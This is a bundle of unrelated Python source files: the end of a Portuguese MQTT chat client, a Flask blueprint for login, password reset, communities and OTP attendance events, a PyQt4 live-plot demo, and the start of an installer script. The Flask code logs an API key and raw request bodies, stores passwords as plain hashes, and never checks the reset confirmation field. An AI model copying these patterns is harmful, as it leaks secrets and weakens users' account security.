                                aux += 1
                        newMessages.append([str(msg[1]), str(msg[2]), aux])
                        self.buttonMsg12347.configure(text=f'{str(msg[1])} \t {aux+1}')
                    else:
                        # Chat is open: print straight into the console.
                        aux = "{}: {}\n".format(str(msg[1]), str(msg[2]))
                        interface.printMsg(self, aux)
            else:
                print("Msg n é para mim")
        else:
            # Group traffic: display it if this user belongs to the group.
            for i in range(len(groups)):
                if str(msg[0]) == groups[i]:
                    aux = "Grupo {}- > {}: {} \n\n".format(
                        str(msg[0]), str(msg[1]), str(msg[2]))
                    interface.printMsg(self, aux)
                    flag = 1
            if flag == 0:
                # Unknown group: field 3 carries a stringified Python list of
                # members; parse it back into a list character by character.
                x = []
                aux = ""
                for i in msg[3]:
                    if i == '[' or i == "'" or i == " ":
                        pass  # list decoration characters, skip
                    else:
                        if i == "," or i == "]":
                            # End of one name: store it and start the next.
                            x.append(aux)
                            aux = ""
                        else:
                            aux += i
                print(aux)
                print(x)
                # Join the group if this user appears in the member list.
                for i in x:
                    if i == username:
                        groups.append(str(msg[0]))
                        aux = "Adicionado em um novo grupo -> {} \n".format(str(msg[0]))
                        interface.printMsg(self, aux)
                        self.createButtonGroup(str(msg[0]))
                    else:
                        print("Nao estou no grupo")
# Logic needs rework for better front-end behaviour (original note).
def on_publish(self):
    """Publish self.msg over MQTT to the selected person or group.

    Uses self.msgToSend (0 = direct, 1 = group) and self.dst, both set by
    getContact(). Wire format is dot separated:
    destination.sender.text.group_flag.
    """
    flag = 0
    # flag tracks whether the destination group already exists.
    if self.msgToSend == 0:
        # Direct message: [destination, source, text, '0'].
        message = self.msg
        aux = "You: {} \n".format(message)
        interface.printMsg(self, aux)
        msg = "{}.{}.{}.0".format(self.dst, username, message)
        client.publish(topic, msg)  # publish on the shared chat topic
        # Local "received"/"read" receipts — timestamps only.
        aux = str(time.strftime("Mensagem Recebida: " + '%B %d, %Y' + ' at ' + '%I:%M %p \n'))
        interface.printMsg(self, aux)
        aux = str(time.strftime("Mensagem Lida: " + '%B %d, %Y' + ' at ' + '%I:%M %p \n'))
        interface.printMsg(self, aux)
    elif self.msgToSend == 1:
        grpName = self.dst  # currently selected group name
        for i in range(len(groups)):
            if grpName == groups[i]:
                # Known group: [group, source, text, '1'].
                message = self.msg
                aux = "You: {} \n".format(message)
                interface.printMsg(self, aux)
                msg = "{}.{}.{}.1".format(grpName, username, message)
                flag = 1
                client.publish(topic, msg)
            i += 1  # no effect: `i` is rebound by the for loop each pass
        if flag == 0:
            # Unknown group: create it by broadcasting the member list on
            # the "geral" topic; the fourth field carries self.listContacts.
            groups.append(grpName)
            message = self.msg
            aux = "You: {} \n".format(message)
            interface.printMsg(self, aux)
            msg = "{}.{}.{}.{}".format(
                grpName, username, message, self.listContacts)
            client.publish("geral", str(msg))
def on_connect(client, userdata, message, rc):
    """MQTT connect callback: log the broker's result code."""
    # NOTE(review): paho-mqtt's on_connect signature is
    # (client, userdata, flags, rc); the third parameter here is presumably
    # the flags dict despite its name — confirm where this is registered.
    print("Connected - rc: ", rc)
def on_subscribe(client, userdata, mid, granted_qos):
    """MQTT subscribe callback: announce that this user connected."""
    # Check packet delivery to every connected client (original TODO)
    # append when someone connects (original TODO)
    print("{} se conectou".format(username))
def on_unsubscribe():
    """Log that this user disconnected."""
    # The connected-users list still needs updating (original TODO).
    # NOTE(review): paho-mqtt invokes on_unsubscribe with
    # (client, userdata, mid); this zero-argument signature would raise
    # TypeError if registered as that callback — confirm.
    print("{} se desconectou".format(username))
# Instantiate the chat interface; its constructor drives the whole app.
i = interface()
|
general.py | from flask import (
Blueprint,
render_template,
request,
jsonify,
make_response
)
# Templates folder and static_folder are for auth routes
general_bp = Blueprint('general_bp',
                       __name__,
                       template_folder='templates',
                       static_folder='static',)
# NOTE: these imports come after the blueprint is created, presumably to
# avoid a circular import with `app` — confirm before reordering.
from app import db
from dryFunctions import *
from models import (
    Users,
    Communities,
    CommunityMembers
)
## Imports for Auth Routes
from flask import flash
import threading
from os import environ
from models import BlackListedTokens
# SendGrid API key from the environment; None when unset.
sg_api = environ.get('SG_API')
## Putting all Auth Routes untill the issue is resolved!
@general_bp.route('/register/user', methods=['POST'])
def user_registration():
    """Create a new user account.

    Expects JSON: userName, userEmail, userPassword, userPasswordConfirm.
    Returns 201 with an auth token on success, 400 with a reason otherwise.
    """
    print('\n\n\n')
    print(str(request.json))
    print('\n\n\n')
    userName = request.json.get('userName')
    userEmail = request.json.get('userEmail')
    userPassword = request.json.get('userPassword')
    userPasswordConfirm = request.json.get('userPasswordConfirm')
    if find_missing(userName, userEmail, userPassword, userPasswordConfirm):
        payLoad = {
            'userName': '',
            'userEmail': '',
            'message': 'Missing Params'
        }
    elif userPassword != userPasswordConfirm:
        payLoad = {
            'userName': '',
            'userEmail': '',
            'message': 'Confirmation Password Different'
        }
    elif malformed_length(
        {
            userName: [3, 64],
            userEmail: [3, 64],
            userPassword: [3, 64]
        }
    ):
        payLoad = {
            'userName': '',
            'userEmail': '',
            'message': 'Param Length is Bad'
        }
    elif user_exist(email=hex_hash(userEmail)):
        payLoad = {
            'userName': '',
            'userEmail': '',
            'message': 'User Exist'
        }
    elif not is_email_valid(userEmail):
        payLoad = {
            'userName': '',
            'userEmail': '',
            'message': 'Email is not valid'
        }
    else:
        try:
            # Only hashes of the email and password are stored.
            userEmailHash = hex_hash(userEmail)
            userPasswordHash = hex_hash(userPassword)
            new_user = Users(username=userName, email=userEmailHash, password=userPasswordHash)
            db.session.add(new_user)
            db.session.commit()
            token = encode_auth_token(user_detail(userEmailHash).get('userId')).decode()
            payLoad = {
                'userName': userName,
                'userEmail': userEmailHash,
                'message': 'User Successfully Created',
                'token': token
            }
            return make_response(jsonify(payLoad), 201)
        except Exception as e:
            print(str(e))
            # Undo the partial insert before replying with an error.
            db.session.rollback()
            payLoad = {
                'userName': '',
                'userEmail': '',
                'message': 'Something went wrong'
            }
    return make_response(jsonify(payLoad), 400)
@general_bp.route('/login/user', methods=['POST'])
def user_login():
    """Authenticate a user against the stored hashes and issue a JWT.

    Expects JSON: userEmail, userPassword, rememberMe.
    Returns 200 with a token on success, 400 with a reason otherwise.
    """
    userEmail = request.json.get('userEmail')
    userPassword = request.json.get('userPassword')
    rememberMe = request.json.get('rememberMe')

    failure = None
    if find_missing(userEmail, userPassword, rememberMe):
        failure = 'Missing Params'
    elif not user_exist(email=hex_hash(userEmail)):
        failure = 'User Does not Exist'
    else:
        userEmailHash = hex_hash(userEmail)
        userPasswordHash = hex_hash(userPassword)
        user_object = user_detail(userEmailHash)
        if userPasswordHash == user_object.get('userPassword'):
            # Credentials check out: hand back a token (lifetime depends
            # on rememberMe).
            token = encode_auth_token(user_object.get('userId'), remember_me=rememberMe).decode()
            payLoad = {
                'userName': user_object.get('userName'),
                'userEmail': userEmailHash,
                'message': 'Success LogIn',
                'token': token
            }
            return make_response(jsonify(payLoad), 200)
        failure = 'Password Mismatch'

    payLoad = {
        'userName': '',
        'userEmail': '',
        'message': failure
    }
    return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/reset', methods=['POST'])
def forgot_password():
    """Email a short-lived password-reset link through SendGrid.

    Answers 202 when the address is known (mail goes out on a background
    thread), 400 with a hint otherwise.
    """
    userEmail = request.json.get('userEmail')
    if find_missing(userEmail):
        payLoad = {
            'userEmail': '',
            'message': 'Missing Params'
        }
    elif malformed_length(
        {
            userEmail: [3, 64],
        }
    ):
        payLoad = {
            'userEmail': '',
            'message': 'Param Length is Bad'
        }
    elif not user_exist(email=hex_hash(userEmail)):
        payLoad = {
            "email": userEmail,
            "message": "Make a Sign-up"
        }
    else:
        userDetails = user_detail(email=hex_hash(userEmail))
        userName = userDetails.get('userName')
        # Reset link embeds a token valid for 5 minutes, keyed on the email.
        passwordResetLink = "https://attendance2hosted.herokuapp.com/auth/password/update/" + \
            encode_auth_token(user_id=userEmail, valid_minutes=5).decode()
        templateId = "d-bca83b14b0f44357b6a78fe531249832"
        url = "https://api.sendgrid.com/v3/mail/send"
        print(sg_api)
        email_header = {'Content-Type': 'application/json', "Authorization": sg_api}
        email_body = {
            "personalizations": [
                {
                    "to": [
                        {
                            "email": userEmail
                        }
                    ],
                    "dynamic_template_data": {
                        "userName": userName,
                        "passwordResetLink": passwordResetLink
                    }
                }
            ],
            "from": {
                "email": "pchackers18@gmail.com"
            },
            "template_id": templateId
        }
        # Fire-and-forget so the HTTP response is not blocked on SendGrid.
        threading.Thread(target=send_email, args=(url, email_header, email_body)).start()
        #send_email(url, email_header, email_body)
        payLoad = {
            "email": userEmail,
            "message": "Check your email"
        }
        return make_response(jsonify(payLoad), 202)
    return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/update/<emailHashToken>', methods=['GET', 'PATCH', 'POST'])
def password_updation(emailHashToken):
    """Handle the emailed password-reset link.

    GET/PATCH just render the reset form; POST validates the token from the
    URL plus the submitted form and updates the stored password hash.
    """
    # The token decodes to the email it was issued for (or an error string).
    userEmail = decode_auth_token(emailHashToken)
    if request.method=='POST':
        if userEmail == 'Signature expired. Please log in again.':
            flash('I suppose you are timed out')
            return render_template('passwordReset.html') # Render to Home Page
        elif userEmail == 'Invalid token. Please log in again.':
            flash('Maybe Hackers love to play')
            return render_template('passwordReset.html') # Render to Home Page
        else:
            userEmailHash = hex_hash(userEmail)
            if not user_exist(userEmailHash):
                flash('Firstly you should Create an Account')
                return render_template('passwordReset.html') # Render to Home Page #--todo-- # Redirect to home page
            # Form fields; userEmail is rebound to the user-typed address.
            userEmail = request.form.get('userEmail')
            userPassword = request.form.get('userPassword')
            # NOTE(review): userPasswordConfirm is read but never compared
            # with userPassword — confirmation is effectively not enforced.
            userPasswordConfirm = request.form.get('userPasswordConfirm')
            if malformed_length(
                {
                    userEmail: [3, 64],
                    userPassword: [3, 64]
                }
            ):
                flash('Password length is Absurd')
                return render_template('passwordReset.html')
            elif user_detail(hex_hash(userEmail)).get('userEmail') != userEmailHash:
                # Typed email must match the one the token was issued for.
                flash('Is this a Typo?')
                return render_template('passwordReset.html')
            else:
                user = Users.query.filter_by(userEmail=userEmailHash).first()
                user.userPassword = hex_hash(userPassword)
                db.session.commit()
                return render_template('passwordReset.html') #--todo-- # Redirect to home page
    return render_template('passwordReset.html')
# BUG FIX: the original rule was 'logout/user' (no leading slash); Flask
# rejects URL rules that do not start with '/', so the blueprint failed to
# register this route.
@general_bp.route('/logout/user', methods=['GET'])
def logout_user():
    """Invalidate the caller's auth token by black-listing it.

    Reads the token from the Authorization header. Returns 200 with a
    status message when a token is present, 400 when it is missing.
    """
    token = request.headers.get('Authorization')
    print(token)
    if token:
        if isBlackListed(token):
            # Already black-listed: report an idempotent logout.
            payLoad = {
                "message": "logged-out-already"
            }
        elif malformed_length(
            {
                token: [3, 1024],
            }
        ):
            payLoad = {
                'message': ['this-request-is-not-processed',
                            'length-constraint-applied'
                            ]
            }
        elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
            payLoad = {
                "message": ["not-a-valid-request",
                            "try-login-first"]
            }
        else:
            # Valid live token: persist it so future requests are refused.
            blackListed = BlackListedTokens(token=token)
            db.session.add(blackListed)
            db.session.commit()
            payLoad = {
                "message": "user-logged-out"
            }
        return make_response(jsonify(payLoad), 200)
    payLoad = {
        "message": "missing-token"
    }
    return make_response(jsonify(payLoad), 400)
########################################
# HomePage for Everyone
@general_bp.route('/', methods=['GET'])
def testing_route():
    """Health-check endpoint confirming the blueprint is mounted."""
    return "Working!!"
@general_bp.route('/community/create', methods=['POST'])
def create_community():
    """Create a community owned by the authenticated user.

    Rejects a duplicate (owner, name) pair; returns the generated join
    token and community id on success (201).
    """
    token = request.headers.get('Authorization')
    communityName = request.json.get('communityName')
    communityDescription = request.json.get('communityDescription')
    if find_missing(token, communityName):
        payLoad = {
            'message': 'missing-params'
        }
    elif malformed_length(
        {
            communityName: [1, 64],
            communityDescription: [0, 256]
        }
    ):
        payLoad = {
            'message': 'bad-length-params'
        }
    elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
        payLoad = {
            'message': 'fresh-login-required'
        }
    elif isBlackListed(token):
        payLoad = {
            'message': 'login-required'
        }
    else:
        # If a User creates a two community with same names then that's a problem
        userId = decode_auth_token(token)
        # User Exists or not shall be checked else sqlalchemy error if valid but false token is sended #--todo--
        try:
            # .first() is None when there is no duplicate, so .joinToken
            # raises AttributeError and control falls into the except branch.
            comJoinToken = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first().joinToken
            if comJoinToken != None:
                payLoad = {
                    'message': ['choose-a-new-name',
                                'delete-older-community',
                                'same-community-name-exist']
                }
                return make_response(jsonify(payLoad), 400)
        except Exception as e:
            print(str(e))
        community = Communities(userId, communityName, communityDescription)
        db.session.add(community)
        db.session.commit()
        # Re-query to pick up the generated join token and id.
        communityQuery = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first()
        comJoinToken = communityQuery.joinToken
        communityId = communityQuery.communityId
        payLoad = {
            'userId': userId,
            'communityName': communityName,
            'communityDescription': communityDescription,
            'comJoinToken': comJoinToken,
            'communityId': communityId,
            'message': 'community-successfully-created'
        }
        return make_response(jsonify(payLoad), 201)
    return make_response(jsonify(payLoad), 400)
@general_bp.route('/community/join', methods=['POST'])
def join_community():
    """Join the authenticated user to the community behind `joinToken`.

    Fails when the token is unknown, joining is closed, or the user is
    already a member.
    """
    token = request.headers.get('Authorization')
    joinToken = request.json.get('joinToken')
    if find_missing(token, joinToken):
        payLoad = {
            'message': 'missing-params'
        }
    elif malformed_length(
        {
            joinToken: [16, 32], # 22 exactly
        }
    ):
        payLoad = {
            'message': 'bad-length-params'
        }
    elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
        payLoad = {
            'message': 'fresh-login-required'
        }
    elif isBlackListed(token):
        payLoad = {
            'message': 'login-required'
        }
    else:
        userId = decode_auth_token(token)
        comJoinToken = Communities.query.filter_by(joinToken=joinToken).first()
        if comJoinToken == None:
            payLoad = {
                'message': 'incorrect-join-token'
            }
            return make_response(jsonify(payLoad), 400)
        elif py_boolean(comJoinToken.joinTokenValid) == False:
            # Owner has closed joining for this community.
            payLoad = {
                'message': 'community-joining-is-closed'
            }
            return make_response(jsonify(payLoad), 403)
        communityId = comJoinToken.communityId
        # user me join same community more than once
        try:
            userInCommunity = CommunityMembers.query.filter(CommunityMembers.userId==userId, CommunityMembers.communityId==communityId).first()
            if userInCommunity != None:
                payLoad = {
                    'message': 'you-are-already-in-this-community'
                }
                return make_response(jsonify(payLoad), 400)
        except Exception as e:
            print(str(e))
        communityMember = CommunityMembers(userId, communityId)
        db.session.add(communityMember)
        db.session.commit()
        payLoad = {
            'userId': userId,
            'communityId': communityId,
            'message': 'community-successfully-joined'
        }
        return make_response(jsonify(payLoad), 200)
    return make_response(jsonify(payLoad), 400)
# Set Event
@general_bp.route('/event/set', methods=['POST'])
def set_event():
    """
    Endpoint to set an Event and put on hold if-
    start now is false
    Required: Admin
    return: event hold status | auth fail
    """
    token = request.headers.get('Authorization')
    event_name_ = request.json.get('event_name')
    event_description_ = request.json.get('event_description')
    ending_time_delta_ = request.json.get('ending_time_delta')
    location_range_ = request.json.get('location_range')
    communityId_ = request.json.get('communityId') # How to get this is a creative part
    latitude_ = request.json.get('latitude')
    longitude_ = request.json.get('longitude')
    broadcast_choice_ = request.json.get('broadcast_choice')
    start_event_ = request.json.get('start_event') # New add_on
    if find_missing(token, event_name_, ending_time_delta_, location_range_,
                    latitude_, longitude_, broadcast_choice_, start_event_, communityId_):
        payLoad = {
            'message': 'missing-params'
        }
    elif malformed_length(
        {
            token: [16, 1024],
            event_name_: [3, 128],
            event_description_: [0, 2048],
        }
    ):
        payLoad = {
            'message': 'bad-length-params'
        }
    elif malformed_dtc(
        {
            # NOTE(review): ending_time_delta_ and location_range_ appear
            # twice in this dict literal; duplicate keys collapse, so the
            # repeats are redundant (harmless but sloppy).
            ending_time_delta_: 'i',
            location_range_: 'i',
            latitude_: 'f',
            longitude_: 'f',
            ending_time_delta_: 'i',
            location_range_: 'i',
            communityId_: 'i'
        }
    ):
        payLoad = {
            'message': 'bad-datatype'
        }
    elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
        payLoad = {
            'message': 'fresh-login-required'
        }
    elif isBlackListed(token):
        payLoad = {
            'message': 'login-required'
        }
    else:
        # Normalise the validated inputs to their proper types.
        latitude_ = float(latitude_)
        longitude_ = float(longitude_)
        ending_time_delta_ = int(ending_time_delta_)
        location_range_ = int(location_range_)
        communityId_ = int(communityId_)
        if py_boolean(broadcast_choice_):
            broadcast_choice_ = 1
        else:
            broadcast_choice_ = 0
        if py_boolean(start_event_):
            start_event_ = 1
        else:
            start_event_ = 0
        # check if user has that community registered under him/her and is Authorized
        userId = decode_auth_token(token)
        userEmail_ = Users.query.get(userId).userEmail
        communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
        if communityId_ not in communityRegistered:
            payLoad = {
                'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
            }
            return make_response(jsonify(payLoad), 403)
        # Getting OTP
        otp_ = random_otp()
        if otp_ == 'Fail':
            payLoad = {
                'message': 'OTP-Generation-Failed'
            }
            return make_response(jsonify(payLoad), 500)
        # NOTE(review): datetime / Events / HoldedEvents are not among this
        # file's visible imports; presumably supplied via
        # `from dryFunctions import *` — verify.
        creation_date_ = datetime.datetime.now()
        if start_event_ == 1:
            # Start immediately: persist as a live event with coordinates.
            new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
                otp=otp_, event_name=event_name_, event_description=event_description_, \
                ending_time_delta=ending_time_delta_, location_range=location_range_, \
                latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
                communityId=communityId_)
            db.session.add(new_event)
            db.session.commit()
            payLoad = {
                'OTP': otp_,
                'EventName': event_name_,
                'EndingInMin': ending_time_delta_,
                'CommunityId': communityId_,
                'EventStarted': True,
                'BroadcastChoice': broadcast_choice_,
                'LocationValidInMeters': location_range_
            }
            return make_response(payLoad, 200) # Object of type Response is not JSON serializable
        else: # else add it in hold
            # Park the event (no coordinates yet) until /event/start is hit.
            new_hold = HoldedEvents(creation_date= creation_date_, userEmail=userEmail_, \
                otp=otp_, event_name=event_name_, event_description=event_description_, \
                ending_time_delta=ending_time_delta_, location_range=location_range_, \
                broadcast_choice=broadcast_choice_, communityId=communityId_)
            db.session.add(new_hold)
            db.session.commit()
            payLoad = {
                'OTP': otp_,
                'EventName': event_name_,
                'EndingInMin': ending_time_delta_,
                'CommunityId': communityId_,
                'EventStarted': False,
                'BroadcastChoice': broadcast_choice_,
                'LocationValidInMeters': location_range_
            }
            return make_response(payLoad, 201) # Object of type Response is not JSON serializable
    return make_response(payLoad, 400)
# Holded Events View
@general_bp.route('/event/holded', methods=['POST'])
def view_holded():
    """
    Shows all holded events from here start event can be clicked
    and then otp is passed dynamically to the start event
    """
    token = request.headers.get('Authorization')
    communityId_ = request.json.get('communityId') # Has to be passed
    if find_missing(token, communityId_):
        payLoad = {
            'message': 'missing-params'
        }
    elif malformed_length(
        {
            token: [16, 1024], # 22 exactly
        }
    ):
        payLoad = {
            'message': 'bad-length-params'
        }
    elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
        payLoad = {
            'message': 'fresh-login-required'
        }
    elif isBlackListed(token):
        payLoad = {
            'message': 'login-required'
        }
    else:
        userId = decode_auth_token(token)
        userEmail_ = Users.query.get(userId).userEmail
        # Only events held by this user for the requested community.
        holdedEvents = HoldedEvents.query.filter(HoldedEvents.userEmail==userEmail_, HoldedEvents.communityId == communityId_).all()
        holdedEventsArray = []
        for event in holdedEvents:
            adder = {
                "holdId": event.holdId,
                "CreationDate": event.creation_date, #--todo-- improve the format
                "OTP":event.otp,
                "EventName": event.event_name,
                "EventDescription": event.event_description,
                "LocationValidInMeters": event.location_range,
                "EndingInMin": event.ending_time_delta,
                "BroadcastChoice": event.broadcast_choice,
                "CommunityId": event.communityId
            }
            holdedEventsArray.append(adder)
        payLoad = holdedEventsArray
        return make_response(jsonify(payLoad), 200)
    return make_response(jsonify(payLoad), 400)
# Holded Event
@general_bp.route('/event/start/<otpNumber>', methods=['POST'])
def start_event(otpNumber):
    """
    This will start the event those are present in holded events
    Post Req: latitude, longitude, authToken
    """
    token = request.headers.get('Authorization')
    latitude_ = request.json.get('latitude')
    longitude_ = request.json.get('longitude')
    # Look up the held event by its OTP (None when absent).
    holdedQuery = HoldedEvents.query.filter_by(otp=otpNumber).first()
    otp_check = holdedQuery
    if otp_check in [None, '']: #does not exsists
        payLoad = {
            'Status': 'Fail',
            'Reason': 'no-such-holded-event'
        }
    elif find_missing(token, latitude_, longitude_,):
        payLoad = {
            'message': 'missing-params',
            'header': ['Authorization', ],
            'body': ['latitude', 'longitude']
        }
    elif malformed_length(
        {
            token: [16, 1024],
        }
    ):
        payLoad = {
            'message': 'bad-length-params'
        }
    elif malformed_dtc(
        {
            latitude_: 'f',
            longitude_: 'f'
        }
    ):
        payLoad = {
            'message': 'bad-datatype'
        }
    elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
        payLoad = {
            'message': 'fresh-login-required'
        }
    elif isBlackListed(token):
        payLoad = {
            'message': 'login-required'
        }
    else:
        latitude_ = float(latitude_)
        longitude_ = float(longitude_)
        communityId_ = holdedQuery.communityId
        # check if user has that community registered under him/her and is Authorized
        userId = decode_auth_token(token)
        userEmail_ = Users.query.get(userId).userEmail
        communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
        if communityId_ not in communityRegistered:
            payLoad = {
                'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
            }
            return make_response(jsonify(payLoad), 403)
        # Promote the held event: copy its fields and add the coordinates.
        creation_date_ = otp_check.creation_date
        userEmail_ = otp_check.userEmail
        otp_ = otpNumber
        event_name_ = otp_check.event_name
        event_description_ = otp_check.event_description
        ending_time_delta_ = otp_check.ending_time_delta
        location_range_ = otp_check.location_range
        broadcast_choice_ = otp_check.broadcast_choice
        communityId_ = otp_check.communityId
        new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
            otp=otp_, event_name=event_name_, event_description=event_description_, \
            ending_time_delta=ending_time_delta_, location_range=location_range_, \
            latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
            communityId=communityId_)
        db.session.add(new_event)
        # Drop the hold row; both changes commit together below.
        HoldedEvents.query.filter_by(otp=otpNumber).delete()
        db.session.commit()
        payLoad = {
            'OTP': otp_,
            'EventName': event_name_,
            'EndingInMin': ending_time_delta_,
            'CommunityId': communityId_,
            'EventStarted': True,
            'BroadcastChoice': broadcast_choice_,
            'LocationValidInMeters': location_range_
        }
        return make_response(payLoad, 200)
    return make_response(payLoad, 400)
|
live_graph_3.py | ###################################################################
# #
# PLOTTING A LIVE GRAPH #
# ---------------------------- #
# EMBED A MATPLOTLIB ANIMATION INSIDE YOUR #
# OWN GUI! #
# #
###################################################################
import sys
import os
from PyQt4 import QtGui
from PyQt4 import QtCore
import functools
import numpy as np
import random as rd
import matplotlib
matplotlib.use("Qt4Agg")
from matplotlib.figure import Figure
from matplotlib.animation import TimedAnimation
from matplotlib.lines import Line2D
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
import time
import threading
def setCustomSize(x, width, height):
    """Lock widget `x` to a fixed width x height."""
    policy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
    policy.setHorizontalStretch(0)
    policy.setVerticalStretch(0)
    policy.setHeightForWidth(x.sizePolicy().hasHeightForWidth())
    x.setSizePolicy(policy)
    # Equal minimum and maximum pins the widget at exactly this size.
    fixed = QtCore.QSize(width, height)
    x.setMinimumSize(fixed)
    x.setMaximumSize(fixed)
''''''
class CustomMainWindow(QtGui.QMainWindow):
    """Main window: a zoom button next to the live matplotlib canvas."""

    def __init__(self):
        super(CustomMainWindow, self).__init__()
        # Define the geometry of the main window
        self.setGeometry(300, 300, 800, 400)
        self.setWindowTitle("my first window")
        # Create FRAME_A
        self.FRAME_A = QtGui.QFrame(self)
        self.FRAME_A.setStyleSheet("QWidget { background-color: %s }" % QtGui.QColor(210,210,235,255).name())
        self.LAYOUT_A = QtGui.QGridLayout()
        self.FRAME_A.setLayout(self.LAYOUT_A)
        self.setCentralWidget(self.FRAME_A)
        # Place the zoom button
        self.zoomBtn = QtGui.QPushButton(text = 'zoom')
        setCustomSize(self.zoomBtn, 100, 50)
        self.zoomBtn.clicked.connect(self.zoomBtnAction)
        self.LAYOUT_A.addWidget(self.zoomBtn, *(0,0))
        # Place the matplotlib figure
        self.myFig = CustomFigCanvas()
        self.LAYOUT_A.addWidget(self.myFig, *(0,1))
        # Daemon thread feeds samples into the canvas via the Qt signal
        # (thread-safe hand-off into the GUI thread).
        myDataLoop = threading.Thread(name = 'myDataLoop', target = dataSendLoop, daemon = True, args = (self.addData_callbackFunc,))
        myDataLoop.start()
        self.show()
    ''''''

    def zoomBtnAction(self):
        # Narrow the y-axis by 5 units on each side.
        print("zoom in")
        self.myFig.zoomIn(5)
    ''''''

    def addData_callbackFunc(self, value):
        # Slot for Communicate.data_signal: forward one sample to the canvas.
        # print("Add data: " + str(value))
        self.myFig.addData(value)
''' End Class '''
class CustomFigCanvas(FigureCanvas, TimedAnimation):
    """Matplotlib canvas animating a scrolling strip chart of live data.

    Samples pushed in through addData() are queued and consumed frame by
    frame, rolling the plotted window leftwards.
    """

    def __init__(self):
        # Values queued by addData() and not yet drawn.
        self.addedData = []
        print(matplotlib.__version__)
        # The data: a fixed window of xlim samples, initialised to 50.
        self.xlim = 200
        self.n = np.linspace(0, self.xlim - 1, self.xlim)
        self.y = (self.n * 0.0) + 50
        # BUG FIX: _step() increments self.abc when the animation raises,
        # but the attribute was never initialised, so the first failure
        # died with AttributeError instead of printing the error count.
        # (The original also built unused throwaway lists a/b; removed.)
        self.abc = 0
        # The window
        self.fig = Figure(figsize=(5,5), dpi=100)
        self.ax1 = self.fig.add_subplot(111)
        # self.ax1 settings
        self.ax1.set_xlabel('time')
        self.ax1.set_ylabel('raw data')
        self.line1 = Line2D([], [], color='blue')
        self.line1_tail = Line2D([], [], color='red', linewidth=2)
        self.line1_head = Line2D([], [], color='red', marker='o', markeredgecolor='r')
        self.ax1.add_line(self.line1)
        self.ax1.add_line(self.line1_tail)
        self.ax1.add_line(self.line1_head)
        self.ax1.set_xlim(0, self.xlim - 1)
        self.ax1.set_ylim(0, 100)
        FigureCanvas.__init__(self, self.fig)
        TimedAnimation.__init__(self, self.fig, interval = 50, blit = True)

    def new_frame_seq(self):
        """One animation frame per sample slot in the window."""
        return iter(range(self.n.size))

    def _init_draw(self):
        # Start every line empty; data is filled in frame by frame.
        lines = [self.line1, self.line1_tail, self.line1_head]
        for l in lines:
            l.set_data([], [])

    def addData(self, value):
        """Queue one sample for the next animation frame (any thread)."""
        self.addedData.append(value)

    def zoomIn(self, value):
        """Shrink the y-range by `value` at both ends and redraw."""
        bottom = self.ax1.get_ylim()[0]
        top = self.ax1.get_ylim()[1]
        bottom += value
        top -= value
        self.ax1.set_ylim(bottom, top)
        self.draw()

    def _step(self, *args):
        # Extends the _step() method for the TimedAnimation class.
        try:
            TimedAnimation._step(self, *args)
        except Exception:
            # Count failures and stop the animation instead of crashing Qt.
            self.abc += 1
            print(str(self.abc))
            TimedAnimation._stop(self)

    def _draw_frame(self, framedata):
        margin = 2
        # Drain the queue: roll the window left, append each new sample.
        while(len(self.addedData) > 0):
            self.y = np.roll(self.y, -1)
            self.y[-1] = self.addedData[0]
            del(self.addedData[0])
        self.line1.set_data(self.n[ 0 : self.n.size - margin ], self.y[ 0 : self.n.size - margin ])
        self.line1_tail.set_data(np.append(self.n[-10:-1 - margin], self.n[-1 - margin]), np.append(self.y[-10:-1 - margin], self.y[-1 - margin]))
        self.line1_head.set_data(self.n[-1 - margin], self.y[-1 - margin])
        self._drawn_artists = [self.line1, self.line1_tail, self.line1_head]
''' End Class '''
# You need to setup a signal slot mechanism, to
# send data to your GUI in a thread-safe way.
# Believe me, if you don't do this right, things
# go very very wrong..
class Communicate(QtCore.QObject):
    """Qt signal carrier used to push new samples into the GUI thread."""
    # Emitted once per generated data point; connected to the window's
    # addData_callbackFunc slot.
    data_signal = QtCore.pyqtSignal(float)
''' End Class '''
def dataSendLoop(addData_callbackFunc):
    """Worker-thread loop: synthesize samples and emit them via a Qt signal.

    Runs forever, emitting one value every 0.1 s and wrapping the index
    over the 500-sample waveform.
    """
    # Setup the signal-slot mechanism.
    mySrc = Communicate()
    mySrc.data_signal.connect(addData_callbackFunc)
    # Simulate some data
    n = np.linspace(0, 499, 500)
    y = 50 + 25*(np.sin(n / 8.3)) + 10*(np.sin(n / 7.5)) - 5*(np.sin(n / 1.5))
    i = 0
    while(True):
        if(i > 499):
            i = 0
        time.sleep(0.1)
        mySrc.data_signal.emit(y[i]) # <- Here you emit a signal!
        i += 1
###
###
if __name__== '__main__':
    # Qt bootstrap: build the GUI and enter the event loop until quit.
    app = QtGui.QApplication(sys.argv)
    QtGui.QApplication.setStyle(QtGui.QStyleFactory.create('Plastique'))
    myGUI = CustomMainWindow()
    sys.exit(app.exec_())
|
fslinstaller.py | #!/usr/bin/python
# Handle unicode encoding
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
    from subprocess import DEVNULL # py3k
except ImportError:
